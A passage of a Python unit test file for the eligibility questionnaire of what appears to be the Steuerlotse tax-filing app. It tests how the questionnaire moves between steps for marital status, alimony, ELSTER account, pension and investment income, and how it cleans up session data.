'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestDivorcedJointTaxesEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, test_request_context):
self.req = test_request_context
def test_handle_sets_correct_prev_url(self):
step = DivorcedJointTaxesEligibilityFailureDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=DivorcedJointTaxesEligibilityFailureDisplaySteuerlotseStep.prepare_render_info(
{}))
expected_url = step.url_for_step(DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
class TestDivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'divorced'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'joint_taxes_eligibility': 'no'}))
expected_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'joint_taxes_eligibility': 'yes'}))
expected_url = step.url_for_step(DivorcedJointTaxesEligibilityFailureDisplaySteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(MaritalStatusInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'joint_taxes_eligibility': 'no'}))
with pytest.raises(IncorrectEligibilityData):
step.handle()
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'joint_taxes_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'joint_taxes_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'joint_taxes_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestSingleAlimonyEligibilityFailureDisplaySteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, test_request_context):
self.req = test_request_context
def test_handle_sets_correct_prev_url(self):
step = SingleAlimonyEligibilityFailureDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=SingleAlimonyEligibilityFailureDisplaySteuerlotseStep.prepare_render_info(
{}))
expected_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
class TestSingleAlimonyDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'divorced',
'joint_taxes_eligibility': 'no'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'alimony_eligibility': 'no'}))
expected_url = step.url_for_step(SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'alimony_eligibility': 'yes'}))
expected_url = step.url_for_step(SingleAlimonyEligibilityFailureDisplaySteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_divorced_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(DivorcedJointTaxesDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_single_session_data_correct_then_set_prev_input_step_correctly(self):
alternative_data = {'marital_status_eligibility': 'single'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(MaritalStatusInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_widowed_session_data_correct_then_set_prev_input_step_correctly(self):
alternative_data = {'marital_status_eligibility': 'widowed'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(MaritalStatusInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_separated_not_lived_together_session_data_correct_then_set_prev_input_step_correctly(self):
alternative_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'yes',
'separated_lived_together_eligibility': 'no'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(SeparatedLivedTogetherEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_separated_not_joint_taxes_session_data_correct_then_set_prev_input_step_correctly(self):
alternative_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'yes',
'separated_lived_together_eligibility': 'yes',
'separated_joint_taxes_eligibility': 'no'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(SeparatedJointTaxesEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'alimony_eligibility': 'no'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'joint_taxes_eligibility': 'no',
'separated_since_last_year_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestSingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'divorced',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'no'}))
expected_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'yes'}))
expected_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(SingleAlimonyDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'user_a_has_elster_account_eligibility': 'no'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'user_a_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'user_a_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
class TestPensionEligibilityFailureDisplaySteuerlotseStep:
def test_handle_sets_correct_prev_url(self, test_request_context):
step = PensionEligibilityFailureDisplaySteuerlotseStep(
endpoint='eligibility',
render_info=PensionEligibilityFailureDisplaySteuerlotseStep.prepare_render_info(
{}))
expected_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
assert step.render_info.prev_url == expected_url
class TestPensionDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'divorced',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'pension_eligibility': 'yes'}))
expected_url = step.url_for_step(InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'pension_eligibility': 'no'}))
expected_url = step.url_for_step(PensionEligibilityFailureDisplaySteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_no_joint_taxes_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(SingleElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_joint_taxes_user_a_no_elster_account_session_data_correct_then_set_prev_input_step_correctly(self):
alternative_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(UserAElsterAccountEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
def test_if_joint_taxes_user_b_no_elster_account_session_data_correct_then_set_prev_input_step_correctly(self):
alternative_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'yes',
'user_b_has_elster_account_eligibility': 'no'}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(alternative_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(UserBElsterAccountDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'pension_eligibility': 'yes'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_correct_data_from_session_then_do_not_delete_any_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(session_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_get_and_full_data_from_session_then_delete_unnecessary_data(self):
only_necessary_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'separated_joint_taxes_eligibility': 'no',
'separated_lived_together_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes', }
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(FULL_SESSION_DATA)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
self.assertEqual(only_necessary_data,
deserialize_session_data(req.session[_ELIGIBILITY_DATA_KEY]))
def test_if_multiple_users_then_show_multiple_text(self):
session_data = {'marital_status_eligibility': 'married',
'separated_since_last_year_eligibility': 'no',
'joint_taxes_eligibility': 'yes',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'alimony_eligibility': 'no',}
expected_number_of_users = 2
expected_choices = [('yes', ngettext('form.eligibility.pension.yes', 'form.eligibility.pension.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.pension.no', 'form.eligibility.pension.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.pension_eligibility.choices)
def test_if_single_user_then_show_single_text(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no'}
expected_number_of_users = 1
expected_choices = [('yes', ngettext('form.eligibility.pension.yes', 'form.eligibility.pension.yes', num=expected_number_of_users)),
('no', ngettext('form.eligibility.pension.no', 'form.eligibility.pension.no', num=expected_number_of_users))]
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession({_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
PensionDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step._pre_handle()
self.assertEqual(expected_choices, step.render_info.form.pension_eligibility.choices)
class TestInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep(unittest.TestCase):
@pytest.fixture(autouse=True)
def attach_fixtures(self, app):
self.app = app
def setUp(self):
self.correct_session_data = {'marital_status_eligibility': 'divorced',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'pension_eligibility': 'yes'}
def test_if_post_and_session_data_correct_and_input_data_correct_than_set_next_input_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'investment_income_eligibility': 'yes'}))
expected_url = step.url_for_step(MinimalInvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_post_and_session_data_correct_and_input_data_incorrect_than_set_next_url_to_alternative_step(self):
with self.app.test_request_context(method='POST') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'investment_income_eligibility': 'no'}))
expected_url = step.url_for_step(EmploymentDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.next_url)
def test_if_session_data_correct_then_set_prev_input_step_correctly(self):
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(self.correct_session_data)})
step = EligibilityStepChooser('eligibility').get_correct_step(
InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
expected_url = step.url_for_step(PensionDecisionEligibilityInputFormSteuerlotseStep.name)
step.handle()
self.assertEqual(expected_url, step.render_info.prev_url)
@pytest.mark.usefixtures('test_request_context')
def test_if_post_and_data_from_before_invalid_then_raise_incorrect_eligibility_data_error(self):
with patch('app.model.recursive_data.RecursiveDataModel.one_previous_field_has_to_be_set',
MagicMock(side_effect=PreviousFieldsMissingError)):
step = EligibilityStepChooser('eligibility').get_correct_step(
InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, True,
form_data=ImmutableMultiDict({'investment_income_eligibility': 'yes'}))
self.assertRaises(IncorrectEligibilityData, step.handle)
def test_if_get_and_incorrect_data_from_session_then_delete_incorrect_data(self):
session_data = {'marital_status_eligibility': 'single',
'separated_since_last_year_eligibility': 'no',
'user_a_has_elster_account_eligibility': 'no',
'user_b_has_elster_account_eligibility': 'no',
'joint_taxes_eligibility': 'no',
'alimony_eligibility': 'no',
'pension_eligibility': 'yes',
'investment_income_eligibility': 'no', }
session_data_with_incorrect_key = {**session_data, **{'INCORRECT_KEY': 'UNNECESSARY_VALUE'}}
with self.app.test_request_context(method='GET') as req:
req.session = SecureCookieSession(
{_ELIGIBILITY_DATA_KEY: create_session_form_data(session_data_with_incorrect_key)})
step = EligibilityStepChooser('eligibility').get_correct_step(
InvestmentIncomeDecisionEligibilityInputFormSteuerlotseStep.name, False, ImmutableMultiDict({}))
step.handle()
